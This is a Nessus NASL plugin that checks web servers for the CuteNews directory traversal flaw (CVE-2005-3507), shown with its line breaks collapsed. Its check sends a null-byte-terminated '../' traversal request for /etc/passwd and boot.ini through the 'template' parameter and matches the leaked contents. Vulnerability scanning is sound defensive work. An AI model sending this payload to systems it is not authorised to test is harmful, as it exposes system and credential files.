📄 cutenews_dir_traversal.nasl
字号:
## This script was written by David Maciejak <david dot maciejak at kyxar dot fr># Ref: retrogod at aliceposta.it## This script is released under the GNU GPL v2if(description){ script_id(20137); script_cve_id("CVE-2005-3507"); script_bugtraq_id(15295); if (defined_func("script_xref")) { script_xref(name:"OSVDB", value:"20472"); script_xref(name:"OSVDB", value:"20473"); script_xref(name:"OSVDB", value:"20474"); } script_version("$Revision: 38 $"); script_name(english:"CuteNews directory traversal flaw"); desc["english"] = "Synopsis :The remote web site contains a PHP application that is affected by adirectory traversal flaw. Description :The version of CuteNews installed on the remote host fails to sanitizeuser-supplied input to the 'template' parameter of the'show_archives.php' and 'show_news.php' scripts. An attacker canexploit this issue to read arbitrary files and possibly even executearbitrary PHP code on the remote host, subject to the privileges ofthe web server user id.See also :http://retrogod.altervista.org/cute141.htmlSolution :Unknown at this time.Risk factor :High / CVSS Base Score : 7 (AV:R/AC:L/Au:NR/C:P/A:P/I:P/B:N)"; script_description(english:desc["english"]); script_summary(english:"Checks for CuteNews dir traversal"); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2005 David Maciejak"); script_family(english:"CGI abuses"); script_require_ports("Services/www", 80); script_dependencie("cutenews_detect.nasl"); script_exclude_keys("Settings/disable_cgi_scanning"); exit(0);}#the codeinclude("http_func.inc");include("http_keepalive.inc");port = get_http_port(default:80);if ( ! get_port_state(port))exit(0);if ( ! can_host_php(port:port) ) exit(0);install_dir = get_kb_item(string("www/", port, "/cutenews"));if (isnull(install_dir)) exit(0);matches = eregmatch(string:install_dir, pattern:"^(.+) under (/.*)$");if (!isnull(matches)) { loc=matches[2]; foreach file (make_list("etc/passwd", "boot.ini")) { req = http_get(item:string(loc, "/show_archives.php?template=../../../../../../../../../", file, "%00"), port:port); res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE); if(res == NULL) exit(0); if(egrep(pattern:"(root:.*:0:[01]:|\[boot loader\])", string:res)){ security_hole(port); exit(0); } }}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -